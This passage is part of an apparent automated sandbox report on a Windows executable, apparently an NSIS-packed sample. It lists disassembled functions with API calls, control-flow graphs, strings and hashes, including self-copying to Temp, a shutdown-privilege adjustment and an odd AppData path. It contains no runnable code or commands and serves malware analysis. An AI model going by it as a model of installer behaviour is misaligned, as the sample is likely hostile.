128->57 129->126 138 4037f9-403800 CloseHandle 129->138 138->126
                                                APIs
                                                • SetErrorMode.KERNELBASE ref: 00403396
                                                • GetVersion.KERNEL32 ref: 0040339C
                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033CF
                                                • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040340C
                                                • OleInitialize.OLE32(00000000), ref: 00403413
                                                • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040342F
                                                • GetCommandLineW.KERNEL32(00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 00403444
                                                • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\3507071243740008011.exe",00000000,?,00000006,00000008,0000000A), ref: 00403457
                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\3507071243740008011.exe",00000020,?,00000006,00000008,0000000A), ref: 0040347E
                                                  • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                  • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035B8
                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C9
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035D5
                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E9
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F1
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403602
                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040360A
                                                • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040361E
                                                  • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E9
                                                • ExitProcess.KERNEL32 ref: 0040370A
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\3507071243740008011.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371D
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\3507071243740008011.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040372C
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\3507071243740008011.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403737
                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\3507071243740008011.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403743
                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040375F
                                                • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037B9
                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\3507071243740008011.exe,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037CD
                                                • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 004037FA
                                                • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403829
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403830
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403845
                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403868
                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 0040388D
                                                • ExitProcess.KERNEL32 ref: 004038B0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular$C:\Users\user\Desktop$C:\Users\user\Desktop\3507071243740008011.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                • API String ID: 2488574733-1263452082
                                                • Opcode ID: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
                                                • Instruction ID: 7b86b6c626ebcb02b9d5dbe90ebec93722fb19806190c38ba91b5de258dcc2d7
                                                • Opcode Fuzzy Hash: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
                                                • Instruction Fuzzy Hash: 0CD12571500310ABD720BF759D45A2B3AACEB4070AF11487FF981B62E1DB7D8E45876E
                                                Function 00404C62 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 139 404c62-404cae GetDlgItem * 2 140 404cb4-404d48 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->140 141 404ecf-404ed6 139->141 142 404d57-404d5e DeleteObject 140->142 143 404d4a-404d55 SendMessageW 140->143 144 404ed8-404ee8 141->144 145 404eea 141->145 147 404d60-404d68 142->147 143->142 146 404eed-404ef6 144->146 145->146 148 404f01-404f07 146->148 149 404ef8-404efb 146->149 150 404d91-404d95 147->150 151 404d6a-404d6d 147->151 155 404f16-404f1d 148->155 156 404f09-404f10 148->156 149->148 152 404fe5-404fec 149->152 150->147 157 404d97-404dc3 call 404217 * 2 150->157 153 404d72-404d8f call 4062a4 SendMessageW * 2 151->153 154 404d6f 151->154 162 40505d-405065 152->162 163 404fee-404ff4 152->163 153->150 154->153 159 404f92-404f95 155->159 160 404f1f-404f22 155->160 156->152 156->155 196 404dc9-404dcf 157->196 197 404e8e-404ea1 GetWindowLongW SetWindowLongW 157->197 159->152 164 404f97-404fa1 159->164 168 404f24-404f2b 160->168 169 404f2d-404f42 call 404bb0 160->169 166 405067-40506d SendMessageW 162->166 167 40506f-405076 162->167 171 405245-405257 call 40427e 163->171 172 404ffa-405004 163->172 174 404fb1-404fbb 164->174 175 404fa3-404faf SendMessageW 164->175 166->167 176 405078-40507f 167->176 177 4050aa-4050b1 167->177 168->159 168->169 169->159 195 404f44-404f55 169->195 172->171 180 40500a-405019 SendMessageW 172->180 174->152 182 404fbd-404fc7 174->182 175->174 183 405081-405082 ImageList_Destroy 176->183 184 405088-40508f 176->184 187 405207-40520e 177->187 188 4050b7-4050c3 call 4011ef 177->188 180->171 189 40501f-405030 SendMessageW 180->189 191 404fd8-404fe2 182->191 192 404fc9-404fd6 182->192 183->184 193 405091-405092 GlobalFree 184->193 194 405098-4050a4 184->194 187->171 190 405210-405217 187->190 214 4050d3-4050d6 188->214 215 4050c5-4050c8 188->215 199 405032-405038 189->199 200 40503a-40503c 189->200 190->171 202 405219-405243 ShowWindow GetDlgItem ShowWindow 190->202 191->152 192->152 193->194 194->177 195->159 204 404f57-404f59 195->204 205 404dd2-404dd9 196->205 203 404ea7-404eab 197->203 199->200 201 40503d-405056 call 401299 SendMessageW 199->201 200->201 201->162 202->171 208 404ec5-404ecd call 40424c 203->208 209 404ead-404ec0 ShowWindow call 40424c 203->209 210 404f5b-404f62 204->210 211 404f6c 204->211 212 404e6f-404e82 205->212 213 404ddf-404e07 205->213 208->141 209->171 224 404f64-404f66 210->224 225 404f68-404f6a 210->225 228 404f6f-404f8b call 40117d 211->228 212->205 219 404e88-404e8c 212->219 226 404e41-404e43 213->226 227 404e09-404e3f SendMessageW 213->227 220 405117-40513b call 4011ef 214->220 221 4050d8-4050f1 call 4012e2 call 401299 214->221 216 4050ca 215->216 217 4050cb-4050ce call 404c30 215->217 216->217 217->214 219->197 219->203 241 405141 220->241 242 4051dd-4051f1 InvalidateRect 220->242 246 405101-405110 SendMessageW 221->246 247 4050f3-4050f9 221->247 224->228 225->228 229 404e45-404e54 SendMessageW 226->229 230 404e56-404e6c SendMessageW 226->230 227->212 228->159 229->212 230->212 243 405144-40514f 241->243 242->187 245 4051f3-405202 call 404b83 call 404b6b 242->245 248 405151-405160 243->248 249 4051c5-4051d7 243->249 245->187 246->220 253 4050fb 247->253 254 4050fc-4050ff 247->254 251 405162-40516f 248->251 252 405173-405176 248->252 249->242 249->243 251->252 256 405178-40517b 252->256 257 40517d-405186 252->257 253->254 254->246 254->247 259 40518b-4051c3 SendMessageW * 2 256->259 257->259 260 405188 257->260 259->249 260->259
                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 00404C7A
                                                • GetDlgItem.USER32(?,00000408), ref: 00404C85
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCF
                                                • LoadBitmapW.USER32(0000006E), ref: 00404CE2
                                                • SetWindowLongW.USER32(?,000000FC,0040525A), ref: 00404CFB
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0F
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D21
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404D37
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D43
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D55
                                                • DeleteObject.GDI32(00000000), ref: 00404D58
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D83
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8F
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E25
                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E50
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E64
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404E93
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA1
                                                • ShowWindow.USER32(?,00000005), ref: 00404EB2
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAF
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405014
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405029
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040504D
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040506D
                                                • ImageList_Destroy.COMCTL32(?), ref: 00405082
                                                • GlobalFree.KERNEL32(?), ref: 00405092
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040510B
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 004051B4
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C3
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E3
                                                • ShowWindow.USER32(?,00000000), ref: 00405231
                                                • GetDlgItem.USER32(?,000003FE), ref: 0040523C
                                                • ShowWindow.USER32(00000000), ref: 00405243
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 1638840714-813528018
                                                • Opcode ID: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
                                                • Instruction ID: ace54df752983209bd77257c2b819bbd2f8b8ae60686516a6448f39b7f2ae2b0
                                                • Opcode Fuzzy Hash: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
                                                • Instruction Fuzzy Hash: E50270B0900209EFDB109FA4DD85AAE7BB5FB84314F10817AF650BA2E1D7799D42CF58
                                                Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                • GlobalFree.KERNEL32(?), ref: 10001D83
                                                • GlobalFree.KERNEL32(?), ref: 10001D88
                                                • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2455471246.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2455454451.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.2455493031.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.2455538566.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Global$Free$lstrcpy$Alloc
                                                • String ID:
                                                • API String ID: 4227406936-0
                                                • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                Function 00405990 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 770 405990-4059b6 call 405c5b 773 4059b8-4059ca DeleteFileW 770->773 774 4059cf-4059d6 770->774 775 405b4c-405b50 773->775 776 4059d8-4059da 774->776 777 4059e9-4059f9 call 406282 774->777 778 4059e0-4059e3 776->778 779 405afa-405aff 776->779 783 405a08-405a09 call 405b9f 777->783 784 4059fb-405a06 lstrcatW 777->784 778->777 778->779 779->775 782 405b01-405b04 779->782 785 405b06-405b0c 782->785 786 405b0e-405b16 call 4065c5 782->786 787 405a0e-405a12 783->787 784->787 785->775 786->775 793 405b18-405b2c call 405b53 call 405948 786->793 791 405a14-405a1c 787->791 792 405a1e-405a24 lstrcatW 787->792 791->792 794 405a29-405a45 lstrlenW FindFirstFileW 791->794 792->794 810 405b44-405b47 call 4052e6 793->810 811 405b2e-405b31 793->811 795 405a4b-405a53 794->795 796 405aef-405af3 794->796 798 405a73-405a87 call 406282 795->798 799 405a55-405a5d 795->799 796->779 801 405af5 796->801 812 405a89-405a91 798->812 813 405a9e-405aa9 call 405948 798->813 802 405ad2-405ae2 FindNextFileW 799->802 803 405a5f-405a67 799->803 801->779 802->795 809 405ae8-405ae9 FindClose 802->809 803->798 806 405a69-405a71 803->806 806->798 806->802 809->796 810->775 811->785 814 405b33-405b42 call 4052e6 call 406048 811->814 812->802 815 405a93-405a9c call 405990 812->815 823 405aca-405acd call 4052e6 813->823 824 405aab-405aae 813->824 814->775 815->802 823->802 827 405ab0-405ac0 call 4052e6 call 406048 824->827 828 405ac2-405ac8 824->828 827->802 828->802
                                                APIs
                                                • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059B9
                                                • lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A01
                                                • lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A24
                                                • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A2A
                                                • FindFirstFileW.KERNELBASE(0042F250,?,?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A3A
                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ADA
                                                • FindClose.KERNEL32(00000000), ref: 00405AE9
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040599E
                                                • \*.*, xrefs: 004059FB
                                                • "C:\Users\user\Desktop\3507071243740008011.exe", xrefs: 00405990
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                • API String ID: 2035342205-3701117409
                                                • Opcode ID: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                • Instruction ID: f2c7612d72ec45a398f238805cdec5f3e53338685f49ce317d80e039c8d46841
                                                • Opcode Fuzzy Hash: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                • Instruction Fuzzy Hash: 4E41C230A01A14AACB21AB658C89AAF7778DF81764F14427FF801711C1D77CA992DE6E
                                                Function 004065C5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405CA4,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 004065D0
                                                • FindClose.KERNEL32(00000000), ref: 004065DC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                • Instruction ID: c6d438537f48b5b2fd9a798109b403d1ef13146c040350fe47557a90c5bdf24f
                                                • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                • Instruction Fuzzy Hash: E6D012315091206BC6551B387E0C84B7A589F153717258B37B86AF11E4C734CC628698
                                                Function 00403D3E Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 261 403d3e-403d50 262 403e91-403ea0 261->262 263 403d56-403d5c 261->263 265 403ea2-403eea GetDlgItem * 2 call 404217 SetClassLongW call 40140b 262->265 266 403eef-403f04 262->266 263->262 264 403d62-403d6b 263->264 267 403d80-403d83 264->267 268 403d6d-403d7a SetWindowPos 264->268 265->266 270 403f44-403f49 call 404263 266->270 271 403f06-403f09 266->271 273 403d85-403d97 ShowWindow 267->273 274 403d9d-403da3 267->274 268->267 279 403f4e-403f69 270->279 276 403f0b-403f16 call 401389 271->276 277 403f3c-403f3e 271->277 273->274 280 403da5-403dba DestroyWindow 274->280 281 403dbf-403dc2 274->281 276->277 292 403f18-403f37 SendMessageW 276->292 277->270 278 4041e4 277->278 286 4041e6-4041ed 278->286 284 403f72-403f78 279->284 285 403f6b-403f6d call 40140b 279->285 287 4041c1-4041c7 280->287 289 403dc4-403dd0 SetWindowLongW 281->289 290 403dd5-403ddb 281->290 295 4041a2-4041bb DestroyWindow EndDialog 284->295 296 403f7e-403f89 284->296 285->284 287->278 294 4041c9-4041cf 287->294 289->286 297 403de1-403df2 GetDlgItem 290->297 298 403e7e-403e8c call 40427e 290->298 292->286 294->278 300 4041d1-4041da ShowWindow 294->300 295->287 296->295 301 403f8f-403fdc call 4062a4 call 404217 * 3 GetDlgItem 296->301 302 403e11-403e14 297->302 303 403df4-403e0b SendMessageW IsWindowEnabled 297->303 298->286 300->278 331 403fe6-404022 ShowWindow KiUserCallbackDispatcher call 404239 EnableWindow 301->331 332 403fde-403fe3 301->332 304 403e16-403e17 302->304 305 403e19-403e1c 302->305 303->278 303->302 308 403e47-403e4c call 4041f0 304->308 309 403e2a-403e2f 305->309 310 403e1e-403e24 305->310 308->298 312 403e65-403e78 SendMessageW 309->312 314 403e31-403e37 309->314 310->312 313 403e26-403e28 310->313 312->298 313->308 317 403e39-403e3f call 40140b 314->317 318 403e4e-403e57 call 40140b 314->318 329 403e45 317->329 318->298 327 403e59-403e63 318->327 327->329 329->308 335 404024-404025 331->335 336 404027 331->336 332->331 337 404029-404057 GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 404059-40406a SendMessageW 337->338 339 40406c 337->339 340 404072-4040b1 call 40424c call 403d1f call 406282 lstrlenW call 4062a4 SetWindowTextW call 401389 338->340 339->340 340->279 351 4040b7-4040b9 340->351 351->279 352 4040bf-4040c3 351->352 353 4040e2-4040f6 DestroyWindow 352->353 354 4040c5-4040cb 352->354 353->287 356 4040fc-404129 CreateDialogParamW 353->356 354->278 355 4040d1-4040d7 354->355 355->279 357 4040dd 355->357 356->287 358 40412f-404186 call 404217 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->278 358->278 363 404188-4041a0 ShowWindow call 404263 358->363 363->287
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D7A
                                                • ShowWindow.USER32(?), ref: 00403D97
                                                • DestroyWindow.USER32 ref: 00403DAB
                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DC7
                                                • GetDlgItem.USER32(?,?), ref: 00403DE8
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DFC
                                                • IsWindowEnabled.USER32(00000000), ref: 00403E03
                                                • GetDlgItem.USER32(?,00000001), ref: 00403EB1
                                                • GetDlgItem.USER32(?,00000002), ref: 00403EBB
                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403ED5
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F26
                                                • GetDlgItem.USER32(?,00000003), ref: 00403FCC
                                                • ShowWindow.USER32(00000000,?), ref: 00403FED
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FFF
                                                • EnableWindow.USER32(?,?), ref: 0040401A
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404030
                                                • EnableMenuItem.USER32(00000000), ref: 00404037
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040404F
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404062
                                                • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 0040408C
                                                • SetWindowTextW.USER32(?,0042D248), ref: 004040A0
                                                • ShowWindow.USER32(?,0000000A), ref: 004041D4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                • String ID:
                                                • API String ID: 3282139019-0
                                                • Opcode ID: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
